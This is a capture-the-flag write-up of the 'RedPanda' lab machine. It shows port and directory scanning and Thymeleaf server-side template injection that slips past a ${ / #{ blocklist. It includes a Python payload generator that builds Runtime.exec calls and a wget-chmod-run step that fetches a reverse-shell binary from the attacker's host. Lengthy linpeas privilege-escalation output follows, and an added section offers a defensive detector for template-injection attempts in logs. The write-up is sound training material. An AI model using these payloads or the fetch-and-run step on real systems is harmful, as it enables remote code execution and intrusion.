Contents
RedPanda
Information gathering
Scan the target host's ports
nmap -sTVC 10.10.11.170
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 11:36 EDT
Nmap scan report for 10.10.11.170
Host is up (0.45s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-US
| Date: Sun, 11 Sep 2022 15:38:23 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en" dir="ltr">
| <head>
| <meta charset="utf-8">
| <meta author="wooden_k">
| <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
| <link rel="stylesheet" href="css/panda.css" type="text/css">
| <link rel="stylesheet" href="css/main.css" type="text/css">
| <title>Red Panda Search | Made with Spring Boot</title>
| </head>
| <body>
| <div class='pande'>
| <div class='ear left'></div>
| <div class='ear right'></div>
| <div class='whiskers left'>
| <span></span>
| <span></span>
| <span></span>
| </div>
| <div class='whiskers right'>
| <span></span>
| <span></span>
| <span></span>
| </div>
| <div class='face'>
| <div class='eye
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET,HEAD,OPTIONS
| Content-Length: 0
| Date: Sun, 11 Sep 2022 15:38:24 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Sun, 11 Sep 2022 15:38:26 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Red Panda Search | Made with Spring Boot
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.59 seconds
Ports 22 (ssh) and 8080 (http-proxy) are open.
Browse to the site at 10.10.11.170:8080
Scan the web directories
dirsearch -u 10.10.11.170:8080
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/8080_22-09-11_11-44-06.txt
Error Log: /root/.dirsearch/logs/errors-22-09-11_11-44-06.log
Target: http://10.10.11.170:8080/
[11:44:07] Starting:
[11:44:45] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[11:44:48] 400 - 435B - /a%5c.aspx
[11:45:36] 500 - 86B - /error
[11:45:36] 500 - 86B - /error/
[11:46:32] 405 - 117B - /search
[11:46:45] 200 - 987B - /stats/
[11:46:45] 200 - 987B - /stats
Task Completed
Two paths were found: /search (the initial page) and /stats
Browse to 10.10.11.170:8080/stats
Fingerprint the website
whatweb 10.10.11.170:8080
http://10.10.11.170:8080 [200 OK] Content-Language[en-US], Country[RESERVED][ZZ], HTML5, IP[10.10.11.170], Title[Red Panda Search | Made with Spring Boot]
- Made with Spring Boot
- The template engines commonly used with Spring Boot today are FreeMarker and Thymeleaf. Spring Boot uses Thymeleaf by default, and it is responsible for rendering the front-end pages.
Try the search bar at 10.10.11.170:8080/stats (the image below shows the default search, i.e. with nothing entered)
- Greg is a hacker. Watch out for his injection attacks!
- This hints that we need to test for injection
Injection attacks
- Common injection types include SQL injection, XSS, XPath injection, XML injection, code injection, command injection, SSTI and so on.
- Many injection attempts failed; SSTI finally succeeded.
- SSTI here is Server-Side Template Injection. The root cause is that the server takes the user's malicious input and, without any processing, uses it as part of the web application's template content; while the template engine compiles and renders the target, it executes the user-inserted statements that break out of the template, which can lead to sensitive information disclosure, code execution, getting a shell and similar problems. The scope of impact depends mainly on the complexity of the template engine.
Expressions in Thymeleaf

| Syntax | Name | Description | Purpose |
|---|---|---|---|
| ${...} | Variable Expressions | Variable expression | Retrieves the value of a context variable |
| *{...} | Selection Variable Expressions | Selection variable expression | Retrieves an attribute value of the selected object |
| #{...} | Message Expressions | Message expression | Internationalizes text messages |
| @{...} | Link URL Expressions | Link expression | Represents the various hyperlink addresses |
| ~{...} | Fragment Expressions | Fragment expression | References a shared code fragment |

Trying the ${...} and #{...} expressions produced a "forbidden" message; the other expression types were not filtered at all.
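The bypass above (only ${ and #{ were rejected, so *{...} went straight to the template engine) is a blocklist problem. The detection helper below is an added example, not code from the original writeup: it URL-decodes a request parameter, checks it against all five Thymeleaf delimiters from the table, and looks for the SpEL T(...) type references and Java package names that mark a code-execution attempt. The log lines it scans are constructed, and the assumption that the search term shows up in a logged query string is mine.

```python
import re
from urllib.parse import unquote_plus

# All five Thymeleaf standard expression delimiters from the table above.
THYMELEAF_DELIMITERS = ("${", "*{", "#{", "@{", "~{")
# The target only rejected these two, which is why *{...} got through.
NAIVE_BLOCKLIST = ("${", "#{")

# SpEL constructs that never occur in an honest search term: a type
# reference T(fully.qualified.Class) and references to JDK / Apache /
# Spring packages used to reach Runtime, IOUtils and friends.
SPEL_TYPE_REF = re.compile(r"T\(\s*[A-Za-z_][\w.]*\s*\)")
JAVA_PACKAGE = re.compile(r"\b(?:java|javax|org\.apache|org\.springframework)\.[\w.]+")


def naive_filter_blocks(value: str) -> bool:
    """The weak check as the writeup describes it: reject only ${ and #{."""
    return any(d in value for d in NAIVE_BLOCKLIST)


def analyse_input(raw: str) -> dict:
    """URL-decode one parameter value and report template-injection indicators."""
    # Decode twice so a double-encoded delimiter (%2524%257B) is still seen.
    value = unquote_plus(unquote_plus(raw))
    delimiters = [d for d in THYMELEAF_DELIMITERS if d in value]
    type_refs = SPEL_TYPE_REF.findall(value)
    packages = sorted(set(JAVA_PACKAGE.findall(value)))
    return {
        "decoded": value,
        "delimiters": delimiters,    # any of the five: expression syntax present
        "type_refs": type_refs,      # T(...): reaching for a Java class
        "java_packages": packages,
        "naive_blocked": naive_filter_blocks(value),
        "rce_attempt": bool(delimiters and (type_refs or packages)),
    }


# Constructed sample request-log lines (not from the target machine); the
# search term is URL-encoded the way a browser submits a form field.
SAMPLE_LOG = """\
10.10.16.10 - - [12/Sep/2022:11:20:01 +0000] "GET /search?name=red+panda HTTP/1.1" 200 1532
10.10.16.10 - - [12/Sep/2022:11:20:07 +0000] "GET /search?name=%24%7B7*7%7D HTTP/1.1" 200 412
10.10.16.10 - - [12/Sep/2022:11:20:15 +0000] "GET /search?name=*%7BT(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(105))%7D HTTP/1.1" 200 987
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')


def scan_log(text: str) -> list:
    """Return one finding per query-string parameter that carries expression syntax."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match or "?" not in match.group(1):
            continue
        query = match.group(1).split("?", 1)[1]
        for pair in query.split("&"):
            key, _, val = pair.partition("=")
            report = analyse_input(val)
            if report["delimiters"]:
                findings.append({"line_no": line_no, "param": key, **report})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        verdict = "RCE attempt" if f["rce_attempt"] else "expression probe"
        blocked = "blocked" if f["naive_blocked"] else "PASSED"
        print(f"line {f['line_no']}: {verdict}; naive ${{/#{{ filter {blocked}: {f['decoded']}")
```

The real fix is not a longer blocklist but keeping user input out of the template source entirely (pass it as a model attribute that Thymeleaf escapes, never as a view name or template text); the scanner is for spotting attempts in existing logs.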
Writing a Python program to generate the payload

```python
#!/usr/bin/python3
def main():
    command = input("please input command:")  # the command to run
    # Encode every character of the command as its decimal code point
    convert = []
    for x in command:
        convert.append(str(ord(x)))
    # Rebuild the string inside the expression from Character.toString() calls chained with concat()
    payload = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % convert[0]
    for i in convert[1:]:
        payload += ".concat(T(java.lang.Character).toString({}))".format(i)
    payload += ").getInputStream())}"
    print(payload)

if __name__ == "__main__":
    main()
```
The generated payload can be pasted straight into the search box.

```
python3 example.py
please input command:cat /home/woodenk/user.txt // user.txt is normally in the regular user's home directory
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(107)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(114)).concat(T(java.lang.Character).toString(46)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(116))).getInputStream())}
```

Search with it to get the user flag we need.
Reverse shell
Generate the reverse-shell binary
Start a listener on port 443
Prepare the reverse shell
Start an HTTP server locally with Python
/* and use the SSTI injection to download the binary from our machine */
wget 10.10.16.10:8000/kalakala.elf
/* give the binary execute permission */
chmod +x kalakala.elf
/* run the binary */
./kalakala.elf
The attacker machine receives the reverse shell.
This box seems to clean up files on a schedule; to avoid having to re-upload the binary if it got deleted, I spawned one more reverse shell.
Privilege escalation
Gathering privilege-escalation information with linpeas.sh
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
╚═══════════════════╝
OS: Linux version 5.4.0-121-generic (buildd@lcy02-amd64-013) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #137-Ubuntu SMP Wed Jun 15 13:33:07 UTC 2022
User & Groups: uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)
Hostname: redpanda
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
════════════════════════════════════════╣ System Information ╠════════════════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 5.4.0-121-generic (buildd@lcy02-amd64-013) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #137-Ubuntu SMP Wed Jun 15 13:33:07 UTC 2022
Distributor ID: Ubuntu
Description: Ubuntu 20.04.4 LTS
Release: 20.04
Codename: focal
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.31
./linpeas.sh: 1188: [[: not found
./linpeas.sh: 1188: rpm: not found
./linpeas.sh: 1188: 0: not found
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Mon Sep 12 11:32:20 UTC 2022
11:32:20 up 2:31, 0 users, load average: 0.15, 0.06, 0.01
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda3
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
sed: -e expression #1, char 326: unknown option to `s'
╔══════════╣ Environment
╚ Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
HISTFILESIZE=0
SHLVL=2
OLDPWD=/home/woodenk
MAVEN_HOME=/opt/maven
_=./linpeas.sh
HISTSIZE=0
LS_COLORS=
MAVEN_VERSION=3.8.3
LESSCLOSE=/usr/bin/lesspipe %s %s
JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64/bin/java
PWD=/tmp/hsperfdata_woodenk
MAVEN_CONFIG_HOME=/home/woodenk/.m2
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
sed: -e expression #1, char 27: unknown option to `s'
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗
═════════════════════════════════════════════╣ Container ╠═════════════════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔════════════════════════════════════════════════╗
══════════════════════════╣ Processes, Crons, Timers, Services and Sockets ╠══════════════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
root 1 0.0 0.5 167788 11164 ? Ss 09:00 0:02 /sbin/init maybe-ubiquity
root 462 0.0 0.5 68516 11976 ? S<s 09:00 0:00 /lib/systemd/systemd-journald
root 490 0.0 0.2 22344 5748 ? Ss 09:00 0:00 /lib/systemd/systemd-udevd
root 614 0.0 0.8 214596 17944 ? SLsl 09:01 0:00 /sbin/multipathd -d -s
systemd+ 638 0.0 0.3 90872 6144 ? Ssl 09:01 0:00 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 650 0.0 0.5 47540 10624 ? Ss 09:01 0:00 /usr/bin/VGAuthService
root 656 0.0 0.4 237776 8140 ? Ssl 09:01 0:08 /usr/bin/vmtoolsd
root 673 0.0 0.2 99896 5912 ? Ssl 09:01 0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 708 0.0 0.4 239292 9316 ? Ssl 09:01 0:00 /usr/lib/accountsservice/accounts-daemon
message+ 710 0.0 0.2 7580 4456 ? Ss 09:01 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
root 729 0.0 0.1 81956 3680 ? Ssl 09:01 0:00 /usr/sbin/irqbalance --foreground
root 730 0.0 0.4 236436 8956 ? Ssl 09:01 0:00 /usr/lib/policykit-1/polkitd --no-debug
syslog 733 0.0 0.2 224344 5144 ? Ssl 09:01 0:00 /usr/sbin/rsyslogd -n -iNONE
root 738 0.0 0.3 17340 7892 ? Ss 09:01 0:00 /lib/systemd/systemd-logind
root 739 0.0 0.6 395484 13492 ? Ssl 09:01 0:00 /usr/lib/udisks2/udisksd
root 756 0.0 0.6 318812 13308 ? Ssl 09:01 0:00 /usr/sbin/ModemManager
root 870 0.0 0.1 6812 2952 ? Ss 09:01 0:00 /usr/sbin/cron -f
root 873 0.0 0.1 8356 3364 ? S 09:01 0:00 _ /usr/sbin/CRON -f
root 874 0.0 0.0 2608 596 ? Ss 09:01 0:00 _ /bin/sh -c sudo -u woodenk -g logs java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar
root 875 0.0 0.2 9420 4628 ? S 09:01 0:00 _ sudo -u woodenk -g logs java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar
woodenk 883 1.4 15.0 3127644 306476 ? Sl 09:01 2:15 _ java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar
woodenk 1179 0.0 0.0 2608 1828 ? S 09:10 0:00 _ /bin/sh
woodenk 1658 0.0 0.0 5320 1152 ? S 09:27 0:00 | _ find /home/woodenk -exec /bin/bash -p ;
woodenk 1659 0.0 0.1 3976 3132 ? S 09:27 0:00 | _ /bin/bash -p
woodenk 6880 0.0 0.0 5320 1148 ? S 11:18 0:00 | _ find /home/woodenk/ -exec bash -ip ;
woodenk 6881 0.0 0.2 5168 4472 ? S 11:18 0:00 | _ bash -ip
woodenk 7178 0.5 0.1 3484 2524 ? S 11:32 0:00 | _ /bin/sh ./linpeas.sh
woodenk 9953 0.0 0.0 3484 968 ? S 11:32 0:00 | _ /bin/sh ./linpeas.sh
woodenk 9955 0.0 0.1 6216 3200 ? R 11:32 0:00 | | _ ps fauxwww
woodenk 9957 0.0 0.0 3484 968 ? S 11:32 0:00 | _ /bin/sh ./linpeas.sh
woodenk 1548 0.0 0.0 2608 532 ? S 09:23 0:00 _ /bin/sh
woodenk 1574 0.0 0.4 15956 9488 ? S 09:24 0:00 _ python3 -c import pty;pty.spawn('/bin/bash')
woodenk 1575 0.0 0.2 8364 4836 pts/0 Ss+ 09:24 0:00 _ /bin/bash
daemon 876 0.0 0.1 3792 2180 ? Ss 09:01 0:00 /usr/sbin/atd -f
root 895 0.0 0.0 5828 1988 tty1 Ss+ 09:01 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
mysql 913 0.1 21.6 1842020 439740 ? Ssl 09:01 0:16 /usr/sbin/mysqld
systemd+ 1090 0.0 0.6 24564 13220 ? Ss 09:07 0:01 /lib/systemd/systemd-resolved
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID TASKCMD USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd: process found (dump creds from memory as root)
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
incrontab Not Found
-rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Jun 14 14:35 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rw-r--r-- 1 root root 201 Feb 14 2020 e2scrub_all
-rw-r--r-- 1 root root 191 Apr 23 2020 popularity-contest
/etc/cron.daily:
total 48
drwxr-xr-x 2 root root 4096 Jul 5 05:52 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 376 Dec 4 2019 apport
-rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg
-rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate
-rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest
-rwxr-xr-x 1 root root 214 Apr 2 2020 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Jun 14 14:35 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Jun 14 14:35 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Jul 5 05:52 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 813 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 403 Aug 5 2021 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/atd.service is executing some relative path
/etc/systemd/system/multi-user.target.wants/grub-common.service is executing some relative path
/etc/systemd/system/sleep.target.wants/grub-common.service is executing some relative path
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Mon 2022-09-12 15:47:22 UTC 4h 14min left Thu 2022-06-23 17:48:21 UTC 2 months 19 days ago motd-news.timer motd-news.service
Mon 2022-09-12 16:46:53 UTC 5h 14min left Mon 2022-09-12 09:49:49 UTC 1h 43min ago ua-timer.timer ua-timer.service
Mon 2022-09-12 16:47:31 UTC 5h 14min left Mon 2022-06-20 10:22:09 UTC 2 months 23 days ago fwupd-refresh.timer fwupd-refresh.service
Tue 2022-09-13 00:00:00 UTC 12h left Mon 2022-09-12 09:01:01 UTC 2h 31min ago logrotate.timer logrotate.service
Tue 2022-09-13 00:00:00 UTC 12h left Mon 2022-09-12 09:01:01 UTC 2h 31min ago man-db.timer man-db.service
Tue 2022-09-13 01:04:03 UTC 13h left Mon 2022-09-12 11:22:14 UTC 10min ago apt-daily.timer apt-daily.service
Tue 2022-09-13 06:52:08 UTC 19h left Mon 2022-09-12 09:13:02 UTC 2h 19min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Tue 2022-09-13 09:15:57 UTC 21h left Mon 2022-09-12 09:15:57 UTC 2h 16min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2022-09-18 03:10:51 UTC 5 days left Mon 2022-09-12 09:01:02 UTC 2h 31min ago e2scrub_all.timer e2scrub_all.service
Mon 2022-09-19 00:00:00 UTC 6 days left Mon 2022-09-12 09:01:01 UTC 2h 31min ago fstrim.timer fstrim.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets
/org/kernel/linux/storage/multipathd
/run/dbus/system_bus_socket
└─(Read Write)
/run/irqbalance//irqbalance729.sock
└─(Read )
/run/irqbalance/irqbalance729.sock
└─(Read )
/run/lvm/lvmpolld.socket
/run/mysqld/mysqld.sock
└─(Read Write)
/run/mysqld/mysqlx.sock
└─(Read Write)
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
└─(Read Write)
/run/udev/control
/run/uuidd/request
└─(Read Write)
/run/vmware/guestServicePipe
└─(Read Write)
/var/run/mysqld/mysqld.sock
└─(Read Write)
/var/run/mysqld/mysqlx.sock
└─(Read Write)
/var/run/vmware/guestServicePipe
└─(Read Write)
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( <policy group="power">)
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 638 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - -
:1.2 708 accounts-daemon root :1.2 accounts-daemon.service - -
:1.22 12770 busctl woodenk :1.22 cron.service - -
:1.3 730 polkitd root :1.3 polkit.service - -
:1.4 1 systemd root :1.4 init.scope - -
:1.5 739 udisksd root :1.5 udisks2.service - -
:1.6 756 ModemManager root :1.6 ModemManager.service - -
:1.7 738 systemd-logind root :1.7 systemd-logind.service - -
:1.9 1090 systemd-resolve systemd-resolve :1.9 systemd-resolved.service - -
com.ubuntu.LanguageSelector - - - (activatable) - - -
com.ubuntu.SoftwareProperties - - - (activatable) - - -
org.freedesktop.Accounts 708 accounts-daemon root :1.2 accounts-daemon.service - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.ModemManager1 756 ModemManager root :1.6 ModemManager.service - -
org.freedesktop.PackageKit - - - (activatable) - - -
org.freedesktop.PolicyKit1 730 polkitd root :1.3 polkit.service - -
org.freedesktop.UDisks2 739 udisksd root :1.5 udisks2.service - -
org.freedesktop.UPower - - - (activatable) - - -
org.freedesktop.bolt - - - (activatable) - - -
org.freedesktop.fwupd - - - (activatable) - - -
org.freedesktop.hostname1 - - - (activatable) - - -
org.freedesktop.locale1 - - - (activatable) - - -
org.freedesktop.login1 738 systemd-logind root :1.7 systemd-logind.service - -
